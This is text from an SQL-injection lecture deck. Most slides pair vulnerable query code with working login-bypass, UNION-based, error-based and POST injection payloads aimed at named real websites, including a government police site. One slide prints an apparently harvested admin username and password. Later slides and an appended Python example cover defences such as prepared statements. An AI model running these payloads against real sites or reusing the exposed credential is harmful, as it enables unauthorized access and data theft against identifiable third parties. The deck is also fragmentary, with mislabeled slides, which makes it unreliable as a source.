15. How We Integrate
That is the real question: how do we integrate? Problems arise when the
application is not attached to the database correctly. The code is what
matters.
16. Contents continued
Database Attacks
What is a Database Attack
Explanation
OWASP Rating (damage rate)
Destruction of SQL injection
History Reviews
Recent bidding in underground
19. Destruction of SQL Injection
Attack
Heartland Payment Systems
This New Jersey payment processing firm lost
data on tens of millions of credit cards in an
attack in 2009. Around 175,000 businesses
were affected by the theft.
TJX
More than 45 million people had their credit card
details stolen and some experts said the actual
figure was likely to be closer to 94 million.
21. Login on Live Sites
http://www.equinet.ch/fr/gestion/login.php
1' OR '1'='1
http://lionsclubofwashim.co.in/admin.php
1' OR '1'='1
admin.axilbusiness.in
1' OR '1'='1
http://www.anemos.in/admin/
1' OR '1'='1
Query Code
select username, password from admin
where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
22. Union Based Attack
http://greenforce.com.pk/page.aspx?page_id=24+UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables--
http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null --
Code
select * from tblName where id='"+Request.QueryString["id"]+"';
23. Error Based Attack
http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and
1=convert(int,@@version)-- -&category_id=2
http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='adminlogin'
and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
http://www.grabbbit.com/admin/login.aspx
userid admin
password grabbbit$
Code
select column1,column2,column3 from table1 join table2 on table1.column1 =
table2.column1 where id='"+Request.QueryString["id"]+"';
25. POST SQL Injection
URL:
http://haryanapolice.gov.in/police/pressreleases/search.asp
Post
text1=rummy'&text2=11/11/2010&SUBMIT=search
Code
select * from tablename where text1='"+Request.Form["text1"].ToString()+"'
and text2='"+Request.Form["text2"].ToString()+"';
26. Why SQL Injection Is Possible
Who is responsible: the database or the programmer?
Why not to blame the database
The secure nature of the database
Lack of awareness
No research-based study
Lack of interest
Non-professional coders
27. Detection of SQL Injection
Manual Check
Why
How
By Whom
Automated Check
Tools
Scanners
28. Securing From SQL Injection
Learn about it
Firewalls
By code
Don't disclose any parameter where it can be avoided
Give the session user the least possible rights
Blacklist evil keywords for the session user
User input validation
Using prepared statements
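The last two points, input validation and prepared statements, as an added example that is not part of the deck: the login and page queries from the earlier slides are rebuilt with Python's sqlite3 against a constructed in-memory table, first as string concatenation (the slides' pattern) and then with placeholders, so the difference can be run and checked.

```python
import sqlite3

# Constructed sample data: one admin account and two pages in an in-memory database.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'hunter2-constructed')")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return db

def login_concat(db, user, pwd):
    """The slide's pattern: user input spliced straight into the SQL text.
    A value such as 1' OR '1'='1 closes the quote and becomes SQL syntax."""
    sql = ("select username, password from admin where username='"
           + user + "' and password='" + pwd + "';")
    return db.execute(sql).fetchone() is not None

def login_prepared(db, user, pwd):
    """Hardened: placeholders. The driver passes the values separately, so a
    quote inside them is only ever compared as data, never parsed as SQL."""
    sql = "select username, password from admin where username=? and password=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None

def page_concat(db, page_id):
    """The union-based slide: a numeric parameter concatenated without quotes,
    so '-1 UNION ALL SELECT ...' appends a second query to the statement."""
    sql = "select title from pages where id=" + page_id
    return [row[0] for row in db.execute(sql)]

def page_prepared(db, page_id):
    """Hardened: validate the type first (int() rejects anything that is not a
    number), then bind it as a parameter."""
    sql = "select title from pages where id=?"
    return [row[0] for row in db.execute(sql, (int(page_id),))]

def demo():
    db = make_db()
    payload = "1' OR '1'='1"
    return {
        "concat_payload_logs_in": login_concat(db, payload, payload),
        "prepared_payload_logs_in": login_prepared(db, payload, payload),
    }
```

With the concatenated query the payload returns every row, so the login succeeds without a valid password; with placeholders the same strings simply fail to match.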
29. More on Firewalls
Use of a firewall
As it is
Customized
Buffer overflows
Null bytes
Difference between a normal user and a hacker
30. Buffer Overflows
Live example
https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
Bypassing from keyword
31. Live Hack Of A Website
http://aquaservices.co.in/
32. Conclusion
Although databases and their contents are
vulnerable to a host of internal and external
threats, it is possible to reduce the attack
vectors to near zero. By addressing these
threats you will meet the requirements of the
most regulated industries in the world.